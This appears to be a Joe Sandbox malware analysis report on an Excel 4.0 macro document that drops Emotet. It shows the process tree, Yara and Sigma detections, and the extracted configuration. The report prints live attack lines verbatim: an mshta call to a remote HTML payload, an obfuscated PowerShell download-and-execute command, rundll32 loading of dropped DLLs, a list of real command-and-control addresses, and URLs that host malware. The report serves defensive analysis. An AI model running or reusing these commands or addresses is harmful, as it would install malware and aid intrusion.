Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
imedpub_2.xls

Overview

General Information

Sample Name:imedpub_2.xls
Analysis ID:562406
MD5:9152f953f0fb28e90fc2cdaa4dc8c6ce
SHA1:e82a389da3baa5a094df5ecc49ac23aa951466d8
SHA256:131c6cbabbaa04e8953a7647ed6a2245a415ff9a2fdd63620bdb9cdc29c479d4
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2684 cmdline: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2692 cmdline: mshta http://91.240.118.168/zqqw/zaas/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 3000 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2180 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 252 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1268 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2696 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 380 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
imedpub_2.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x242a2:$s1: Excel
  • 0x25313:$s1: Excel
  • 0x4831:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub_2.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    imedpub_2.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
    • 0x47b7:$e2: 00 4D 61 63 72 6F 31 85 00
    • 0x4831:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
    • 0x946:$x1: * #,##0
    • 0x952:$x1: * #,##0
    • 0x9fb:$x1: * #,##0
    • 0xa0a:$x1: * #,##0
    • 0xa36:$x1: * #,##0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\imedpub_2.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x242a2:$s1: Excel
    • 0x25313:$s1: Excel
    • 0x4831:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\imedpub_2.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\Users\user\Desktop\imedpub_2.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
      • 0x47b7:$e2: 00 4D 61 63 72 6F 31 85 00
      • 0x4831:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
      • 0x946:$x1: * #,##0
      • 0x952:$x1: * #,##0
      • 0x9fb:$x1: * #,##0
      • 0xa0a:$x1: * #,##0
      • 0xa36:$x1: * #,##0
      C:\ProgramData\QWER.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 61 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  10.2.rundll32.exe.2f10000.12.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    16.2.rundll32.exe.210000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      12.2.rundll32.exe.410000.3.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        10.2.rundll32.exe.300000.2.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          12.2.rundll32.exe.27b0000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 90 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2692, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2692, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1940
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2684, ProcessCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ProcessId: 2692
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2816, ProcessCommandLine: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, ProcessId: 2684
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2692, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1940
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2692, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1940
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2692, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1940

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://haileywells.com/cgi-bin/KJUOaq/PE3Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.pngAvira URL Cloud: Label: malware
                            Source: https://onewaymedia.ro/wp-includAvira URL Cloud: Label: malware
                            Source: https://lodev7.com/wp-content/dpAvira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3Avira URL Cloud: Label: malware
                            Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2Avira URL Cloud: Label: malware
                            Source: https://www.praachichemfood.com/wp-json/Avira URL Cloud: Label: malware
                            Source: http://bakultante.com/tee5oeot/QAvira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.pngAvira URL Cloud: Label: malware
                            Source: https://dtmconsulting.ca/wp-includes/dkCFwyE/Avira URL Cloud: Label: malware
                            Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.pngAvira URL Cloud: Label: malware
                            Source: https://onewaymedia.ro/wp-includes/k/PE3Avira URL Cloud: Label: malware
